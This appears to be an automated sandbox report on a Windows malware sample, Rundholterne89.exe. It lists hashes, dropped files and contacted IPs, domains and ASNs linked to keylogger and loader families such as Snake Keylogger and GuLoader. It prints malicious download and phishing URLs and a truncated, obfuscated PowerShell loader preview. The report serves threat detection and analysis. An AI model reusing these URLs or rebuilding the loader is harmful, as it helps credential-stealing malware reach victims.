• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 8084 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Rundholterne89.exe
Timeline (Time | Type | Description):
10:03:14 | API Interceptor | 35x Sleep call for process: powershell.exe modified
10:04:19 | API Interceptor | 15098x Sleep call for process: msiexec.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe | malicious | Snake Keylogger, VIP Keylogger | -
149.154.167.220 | Swift Detail 103.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | -
149.154.167.220 | FACTURA-ALBARANES.vbs | malicious | GuLoader, Snake Keylogger | -
149.154.167.220 | New Purchase_Order_110511.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | -
149.154.167.220 | 7vbu8ZW8lFI8mn5.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | -
149.154.167.220 | TicariXHesapXXzetiniz.exe | malicious | GuLoader, Snake Keylogger | -
149.154.167.220 | REVISED PROFORMA INVOICE STVC007934196.exe | malicious | Snake Keylogger, VIP Keylogger | -
149.154.167.220 | MT103-539 PAYMENT (1).docx.doc | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | -
149.154.167.220 | SecuriteInfo.com.Win32.CrypterX-gen.11226.22760.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | -
149.154.167.220 | TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | -
188.114.97.3 | Technical Datasheet and Specification_PDF.exe | malicious | Unknown | www.rihanaroly.sbs/othk/?0dk=RykyQ3QZ+r1dqZwhAQupYMuQy26h2PYi8Fyfl3RAfHSVFgYOfXbCDUNV+aNHe22U393WzLygMMdANTa+vksg1hx1LENxGTGsZa2bATkiGgfiS6KvHA==&urk=NXuT
188.114.97.3 | request-BPp -RFQ 0975432.exe | malicious | PureLog Stealer | www.ergeneescortg.xyz/guou/
188.114.97.3 | Halkbank_Ekstre_20230426_075819_154055.exe | malicious | FormBook | www.thetahostthe.top/9r5x/
188.114.97.3 | http://comodozeropoint.com/updates/1736162964/N1/Team.exe | malicious | Unknown | comodozeropoint.com/updates/1736162964/N1/Team.exe
188.114.97.3 | SecuriteInfo.com.Win32.MalwareX-gen.14607.6011.exe | malicious | Unknown | servicetelemetryserver.shop/api/index.php
188.114.97.3 | SecuriteInfo.com.Trojan.DownLoader47.45523.5497.16574.exe | malicious | Unknown | servicetelemetryserver.shop/api/index.php
188.114.97.3 | SecuriteInfo.com.Trojan.DownLoader47.45523.5497.16574.exe | malicious | Unknown | servicetelemetryserver.shop/api/index.php
188.114.97.3 | ZP4KZDHVHWZZ2DC13DMX.exe | malicious | Amadey | tipinfodownload-soft1.com/g9jvjfd73/index.php
188.114.97.3 | aQdB62N7SB.elf | malicious | Shikitega, Xmrig | main.dsn.ovh/dns/loadbit
188.114.97.3 | PO#071024.exe | malicious | FormBook | www.freedietbuilder.online/nnla/
193.122.130.0 | Swift Detail 103.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.130.0 | 001_215_EA2047939_202410210815.exe | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/
193.122.130.0 | MT103-539 PAYMENT (1).docx.doc | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.130.0 | PaymentXConfirmationXcopy.xls | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.130.0 | RFQ 1307.scr.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.130.0 | Purchase Order.exe | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/
193.122.130.0 | routcrying.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.130.0 | mnobizx.doc | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.130.0 | rcota____oRFQNO-N__merodopedido106673.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.130.0 | Justificante de pago.exe | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
reallyfreegeoip.org | SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
reallyfreegeoip.org | Swift Detail 103.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.96.3
reallyfreegeoip.org | FACTURA-ALBARANES.vbs | malicious | GuLoader, Snake Keylogger | 188.114.96.3
reallyfreegeoip.org | New Purchase_Order_110511.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.97.3
reallyfreegeoip.org | 7vbu8ZW8lFI8mn5.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.96.3
reallyfreegeoip.org | z547GEViTFyfCZdLZP.exe | malicious | PureLog Stealer, Snake Keylogger | 188.114.96.3
reallyfreegeoip.org | SecuriteInfo.com.Trojan.PackedNET.3057.16994.22226.exe | malicious | Snake Keylogger | 188.114.96.3
reallyfreegeoip.org | TicariXHesapXXzetiniz.exe | malicious | GuLoader, Snake Keylogger | 188.114.97.3
reallyfreegeoip.org | REVISED PROFORMA INVOICE STVC007934196.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
reallyfreegeoip.org | MT103-539 PAYMENT (1).docx.doc | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.96.3
smtp.ionos.es | Snvlerier.exe | malicious | GuLoader, Snake Keylogger | 213.165.67.118
smtp.ionos.es | Snvlerier.exe | malicious | GuLoader, Snake Keylogger | 213.165.67.102
smtp.ionos.es | Contrato de Cesin de Crditos Sin Recurso.exe | malicious | GuLoader, Snake Keylogger | 213.165.67.118
smtp.ionos.es | r8x1WvSkbWSUjXh6.exe | malicious | Snake Keylogger, VIP Keylogger | 213.165.67.102
smtp.ionos.es | ZcH50SI4q45Dtpf.exe | malicious | Snake Keylogger, VIP Keylogger | 213.165.67.118
smtp.ionos.es | LisectAVT_2403002A_257.exe | malicious | AgentTesla | 213.165.67.102
smtp.ionos.es | USyhqVZT33vX26Y.exe | malicious | AgentTesla | 213.165.67.118
smtp.ionos.es | 60yQVZ67vj.exe | malicious | AgentTesla, PureLog Stealer | 213.165.67.102
smtp.ionos.es | JUSTIFICANTE PAGO FACTURA.vbs | malicious | AgentTesla, GuLoader | 213.165.67.118
smtp.ionos.es | Nowe zam#U00f3wienie nr 201030019.exe | malicious | AgentTesla | 213.165.67.102
checkip.dyndns.com | SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
checkip.dyndns.com | Swift Detail 103.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 193.122.130.0
checkip.dyndns.com | FACTURA-ALBARANES.vbs | malicious | GuLoader, Snake Keylogger | 132.226.247.73
checkip.dyndns.com | New Purchase_Order_110511.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 193.122.6.168
checkip.dyndns.com | 7vbu8ZW8lFI8mn5.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 158.101.44.242
checkip.dyndns.com | 001_215_EA2047939_202410210815.exe | malicious | GuLoader, Snake Keylogger | 193.122.130.0
checkip.dyndns.com | z547GEViTFyfCZdLZP.exe | malicious | PureLog Stealer, Snake Keylogger | 132.226.8.169
checkip.dyndns.com | SecuriteInfo.com.Trojan.PackedNET.3057.16994.22226.exe | malicious | Snake Keylogger | 193.122.6.168
checkip.dyndns.com | TicariXHesapXXzetiniz.exe | malicious | GuLoader, Snake Keylogger | 132.226.8.169
checkip.dyndns.com | REVISED PROFORMA INVOICE STVC007934196.exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
api.telegram.org | SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | Swift Detail 103.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | FACTURA-ALBARANES.vbs | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | New Purchase_Order_110511.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | 7vbu8ZW8lFI8mn5.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | TicariXHesapXXzetiniz.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
api.telegram.org | REVISED PROFORMA INVOICE STVC007934196.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | MT103-539 PAYMENT (1).docx.doc | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | SecuriteInfo.com.Win32.CrypterX-gen.11226.22760.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | Swift Detail 103.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | FACTURA-ALBARANES.vbs | malicious | GuLoader, Snake Keylogger | 149.154.167.220
TELEGRAMRU | New Purchase_Order_110511.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | 7vbu8ZW8lFI8mn5.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | TicariXHesapXXzetiniz.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
TELEGRAMRU | REVISED PROFORMA INVOICE STVC007934196.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | MT103-539 PAYMENT (1).docx.doc | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | SecuriteInfo.com.Win32.CrypterX-gen.11226.22760.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220
CLOUDFLARENETUS | BA4M310209H14956.xls | malicious | Remcos | 188.114.96.3
CLOUDFLARENETUS | https://email.mail.customfeedback.com/c/eJyUkD-P1TAQxD9N3J2VXXuduHDxDpEGiQpE7T_rS_QS-8kxF45Pjw5EQ0c7oxnNb6I_Hn57KZ_4zSlEg2SizkA0WtbGjsF6M4G2SGHChMFrYhFr6T729wz6NOfRayKLZCipOVACmgA4mEwhEHnFbEVykCcMs2AHE1oCrQBF3trZP_uD3a0kbmctItd2-Za-cVhrvX9tu1t7f5yDug24DLj0WvdThra9rH2v0e8y1mPA5eT69NsbcPHp2MqAy1-6d-36U_j0imJ1SUcVQFkMMSitNMCkxpR4jhBtVFpsDkfUMCIAqlmhBPnxtujnDzdSSPoZLA16PPy2y_j97PXIzCn4eH9fI-7_88y_gHkrvkTeSq7yJyh5cZCxNpbXVlK9Tlm4D7iIw01GkxoBxKPVH29f6p2Lm2adApjs7az0FDRE8Hkeo9ETc4qzNqPxRFk0F9e2nb0-Vm7S77svgx7bo1XZOa7i1eGvAAAA__9cb6ca | malicious | Unknown | 104.16.20.118
CLOUDFLARENETUS | BL Packing List & Invoice.xls | malicious | Unknown | 188.114.96.3
CLOUDFLARENETUS | ProformaInvoice.xls | malicious | PureLog Stealer | 188.114.96.3
CLOUDFLARENETUS | SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
CLOUDFLARENETUS | Swift Detail 103.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.96.3
CLOUDFLARENETUS | https://link.edgepilot.com/s/a87a8c67/R8ziiM5L9EqrFhZqAjyPWg?u=https://debbydollar.com/ | malicious | Unknown | 104.18.11.207
CLOUDFLARENETUS | FACTURA-ALBARANES.vbs | malicious | GuLoader, Snake Keylogger | 188.114.96.3
CLOUDFLARENETUS | FZCO - PO#12345.exe | malicious | AgentTesla | 104.26.13.205
CLOUDFLARENETUS | New Purchase_Order_110511.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.97.3
ONEANDONE-ASBrauerstrasse48DE | Invoice.exe | malicious | FormBook, PureLog Stealer | 217.160.0.158
ONEANDONE-ASBrauerstrasse48DE | la.bot.powerpc.elf | malicious | Mirai | 212.227.7.42
ONEANDONE-ASBrauerstrasse48DE | Request for 30 Downpayment.exe | malicious | FormBook, PureLog Stealer | 217.160.0.93
ONEANDONE-ASBrauerstrasse48DE | la.bot.arm.elf | malicious | Unknown | 212.227.138.124
ONEANDONE-ASBrauerstrasse48DE | yakuza.m68k.elf | malicious | Unknown | 74.208.123.157
ONEANDONE-ASBrauerstrasse48DE | la.bot.powerpc.elf | malicious | Unknown | 217.160.111.108
ONEANDONE-ASBrauerstrasse48DE | Ageeconstruction -_(BENEFIT INSTRUCTIONS)_.docx | malicious | Mamba2FA | 217.160.0.215
ONEANDONE-ASBrauerstrasse48DE | Ageeconstruction -_(BENEFIT INSTRUCTIONS)_.docx | malicious | Mamba2FA | 217.160.0.215
ONEANDONE-ASBrauerstrasse48DE | EMnyl2klUV.elf | malicious | Mirai | 217.160.45.92
ONEANDONE-ASBrauerstrasse48DE | 4ui8luUSNp.exe | malicious | Coinhive, Xmrig | 212.227.15.41
ORACLE-BMC-31898US | Swift Detail 103.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 193.122.130.0
ORACLE-BMC-31898US | New Purchase_Order_110511.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 193.122.6.168
ORACLE-BMC-31898US | 7vbu8ZW8lFI8mn5.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 158.101.44.242
ORACLE-BMC-31898US | 001_215_EA2047939_202410210815.exe | malicious | GuLoader, Snake Keylogger | 193.122.130.0
ORACLE-BMC-31898US | SecuriteInfo.com.Trojan.PackedNET.3057.16994.22226.exe | malicious | Snake Keylogger | 193.122.6.168
ORACLE-BMC-31898US | REVISED PROFORMA INVOICE STVC007934196.exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
ORACLE-BMC-31898US | MT103-539 PAYMENT (1).docx.doc | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 158.101.44.242
ORACLE-BMC-31898US | PaymentXConfirmationXcopy.xls | malicious | Snake Keylogger | 158.101.44.242
ORACLE-BMC-31898US | SUAlTWPjKQ.exe | malicious | PureLog Stealer, Snake Keylogger | 158.101.44.242
ORACLE-BMC-31898US | SecuriteInfo.com.Win32.CrypterX-gen.11226.22760.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 158.101.44.242
Match | Associated Sample Name / URL | Detection | Threat Name | Context
54328bd36c14bd82ddaa0c04b25ed9ad | SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | Swift Detail 103.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | FACTURA-ALBARANES.vbs | malicious | GuLoader, Snake Keylogger | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | New Purchase_Order_110511.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | 7vbu8ZW8lFI8mn5.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | z547GEViTFyfCZdLZP.exe | malicious | PureLog Stealer, Snake Keylogger | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | SecuriteInfo.com.Trojan.PackedNET.3057.16994.22226.exe | malicious | Snake Keylogger | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | TicariXHesapXXzetiniz.exe | malicious | GuLoader, Snake Keylogger | 188.114.97.3
54328bd36c14bd82ddaa0c04b25ed9ad | REVISED PROFORMA INVOICE STVC007934196.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
                                                                                          Musterino_94372478_Ekno_21_20241024761_ekstre.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                          • 188.114.97.3
                                                                                          3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          Swift Detail 103.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          6 654398.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • 149.154.167.220
                                                                                          FACTURA-ALBARANES.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          Massageapparater.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • 149.154.167.220
                                                                                          FZCO - PO#12345.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 149.154.167.220
                                                                                          New Purchase_Order_110511.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          7vbu8ZW8lFI8mn5.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          Ref#150689.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 149.154.167.220
                                                                                          MEC20241022001.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                          • 149.154.167.220
                                                                                          37f463bf4616ecd445d4a1937da06e196 654398.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • 142.250.185.174
                                                                                          • 142.250.186.65
                                                                                          FACTURA-ALBARANES.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 142.250.185.174
                                                                                          • 142.250.186.65
                                                                                          Massageapparater.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • 142.250.185.174
                                                                                          • 142.250.186.65
                                                                                          phc.exeGet hashmaliciousUnknownBrowse
                                                                                          • 142.250.185.174
                                                                                          • 142.250.186.65
                                                                                          phc.exeGet hashmaliciousUnknownBrowse
                                                                                          • 142.250.185.174
                                                                                          • 142.250.186.65
                                                                                          001_215_EA2047939_202410210815.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 142.250.185.174
                                                                                          • 142.250.186.65
                                                                                          Fignen234.exeGet hashmaliciousGuLoaderBrowse
                                                                                          • 142.250.185.174
                                                                                          • 142.250.186.65
                                                                                          Fignen234.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • 142.250.185.174
                                                                                          • 142.250.186.65
                                                                                          MEC20241022001.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                          • 142.250.185.174
                                                                                          • 142.250.186.65
                                                                                          zamowienie.exeGet hashmaliciousGuLoaderBrowse
                                                                                          • 142.250.185.174
                                                                                          • 142.250.186.65
                                                                                          No context
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 14744
Entropy (8bit): 4.992175361088568
Encrypted: false
SSDEEP: 384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
MD5: A35685B2B980F4BD3C6FD278EA661412
SHA1: 59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
SHA-256: 3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
SHA-512: 70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
Malicious: false
Reputation: moderate, very likely benign file
Preview: PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Users\user\Desktop\Rundholterne89.exe
File Type: ASCII text, with very long lines (3437), with CRLF, LF line terminators
Category: dropped
Size (bytes): 55452
Entropy (8bit): 5.30644161671957
Encrypted: false
SSDEEP: 1536:L3ZsYDoSFyAkhotYr3XpNhdrWlR7uDZy4k:DiYMSFyVoANpy4k
MD5: 0D2CE39822E9236A380F4D1D53550E93
SHA1: 8381B0E62708112DBFBED036650BF0667EC4476B
SHA-256: ED34DB2A55A35C90B524D2448353EB73D28DA7D7FF401477165C226FF25DE9AF
SHA-512: F365BB861DB3FC6D29736B3F8C0377BB4F8318FFF94BC96033AE208760082B529B8AEA4CF79DE9EFA3608C79AC91FE57E19F26959831F621BBA8816E1013AFC3
Malicious: true
Preview: $Spales=$Undiluvian;..<#Standpunkts Smpistolers Beatgruppes #>..<#Bytime Stirk Sexfilmene Vermifuges Charquis Sintering #>..<#Djrvheders riksmal Ihjel Kartotekspostens Ligitimizing #>..<#Blennometritis Legalt Angrebsraketter Sabbathvilen #>..<#Margritt Tilsendelse Somnopathy Lderingerne Harmoni Tilsnigelsen #>..<#Dolichosauria Valm Interestless Chartered #>...$Frumps = @'.Lempn.Extra$Bec.rehom,laAftal=T,ckn$ Vi,iVMi.anaG.rkelT nsmgWudgekAmerioUdraan KystgDisc eFrancdVggelmf rsvmGasmeeSpindr.nfors ,norePole hBinyraPseudnCreeddUltralDisseelirkslOmsteiRykkeg BarmeAcros; Ve.e.Footbf Ru buVankenEarthceucattUkuleiBeamio CondnFrem A.pelPsvaneaSomallAvl,dm Gas,eUpc.ubProjelBanelaMuskldparapsSirentGrypha xpegchar,eB ttlt psedsInfor rbdig(Arves$ sculB arledTeet eSkrmpfYnkvro SarcrEkspoeUnfaklLiquegCortigSelvmeAerodt Tick2derat1Under5Lo el,Nosk $ agsiVHer taCackllInklug AplokS oleo orlnVandugDefoae womadPlanem VddemIngereSparar,fnaksSemic)Barba Ke a{Fri.i. rhve.C ose$TeddyARe urg N ber UninaW

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category: dropped
Size (bytes): 891148
Entropy (8bit): 7.7193229791674485
Encrypted: false
SSDEEP: 24576:/75JHVcDo1hTW+VeQ9Ke+alCJmvulW6Nd0vd:jDHVUW/VrKe+m7mwMAd
MD5: A1E239C4D5116E289CE0597A92844EDE
SHA1: 4562D452CCC32512291C3165A0B9B3C076B28094
SHA-256: 1E507FEBDD48A2BF2429C8011BD5CBC5C7B018207BDAEC87665B8B51FA13D904
SHA-512: 500DDCDC2F1E3CA0DA0A43006B99C6E78697433FC0757D25DDFF94190DD2D725799FAF267EFDFACDEF758E9024591368454F14025662CC6A1309BCE7863494D2
Malicious: true
Antivirus:
  • Antivirus: Avira, Detection: 100%
  • Antivirus: ReversingLabs, Detection: 42%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F..v...F...@...F.Rich..F.........................PE..L....{.W.................`...|.......1.......p....@.......................................@.................................4u....... ..X............................................................................p...............................text...._.......`.................. ..`.rdata..R....p.......d..............@..@.data....T...........x..............@....ndata...0...............................rsrc...X.... .......~..............@..@

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
Preview: [ZoneTransfer]....ZoneId=0

Process: C:\Users\user\Desktop\Rundholterne89.exe
File Type: ASCII text, with very long lines (360), with CRLF line terminators
Category: dropped
Size (bytes): 362
Entropy (8bit): 4.295609901239941
Encrypted: false
SSDEEP: 6:OV0mI/AA3CU6sDq6ry0bxmAOvFz0/TWEMsesxM7JXZO:OVcAV6yw3Ovx0/q3shK7Js
MD5: A47DE65B255D62E154E75208730B37D2
SHA1: 9AD95C489EABDBCD12C02CD312C85D0C73A565F7
SHA-256: 1527C27BE377FB2EFDB75E64EF88FEE6B879712DEC1AE6E8CCA4E66188099784
SHA-512: 206FB780CA6A6BEA7B1DA2AAD8D1E8C38331AE5A03CC82FC181A6E13234DC4523033AA775A3F15C261FEC74910ECAF622ABAC99444E8DAA8B63EC35379FBE29A
Malicious: false
Preview: beboere sletteprogrammerne afbrndtes untruthfulness,methanolysis blokniveauets tegnbaseret keisar arbejdsmndene rger,lsenets quindecimvir complexify hundevagten cymblernes.cressier immediate batchkrslerne antisepalous cryptonymic pings,pampination spytkirtlen vandranunkel stormmaage,diversificer udtalendes attributgrammatiks snedkeris sati frailejon rvturene..

Process: C:\Users\user\Desktop\Rundholterne89.exe
File Type: GTA audio index data (SDT)
Category: dropped
Size (bytes): 339224
Entropy (8bit): 3.2329059465811363
Encrypted: false
SSDEEP: 3072:TlwUufGWwltoSeWq5Xck5tiy5ScV95Cca+8aB5p0jsDytfuWoaP/ZTf:x3W045X/5tiyB8faB5p4sD22uN
MD5: 2AFAF6367CF5833A8885999FEFA5B44A
SHA1: 58EDFAC56FD3BDA98CAD7F2A784F58CF0CCCA5A9
SHA-256: 66D0440913A064549BF52DD102475A422A55A0A1A99A38C0445CCF84EB98C074
SHA-512: A769F552CD91CE7163FE25C6E785D3A225979A9E50805F031C05E52CF5F82FB1E582FE621C947C7B0709F9E627C6CF318CF899CA97CC2BC4A3D934B94C2279A4
Malicious: false

Process: C:\Users\user\Desktop\Rundholterne89.exe
File Type: data
Category: dropped
Size (bytes): 91155
Entropy (8bit): 3.2484639775571122
Encrypted: false
SSDEEP: 768:sx0eYUpSjZTH4Refp/ZwLfKCGhiKveAC4LjJNV8RHwnx/F0H0jbPYER9RLXLxFJi:8UhyD9meQZFRRbLXdDRseVQq4
MD5: 55DD84338306B8F361571D07E3D03F25
SHA1: 5F086147B0ED6D4CBE40B6F81C1003EB07714B94
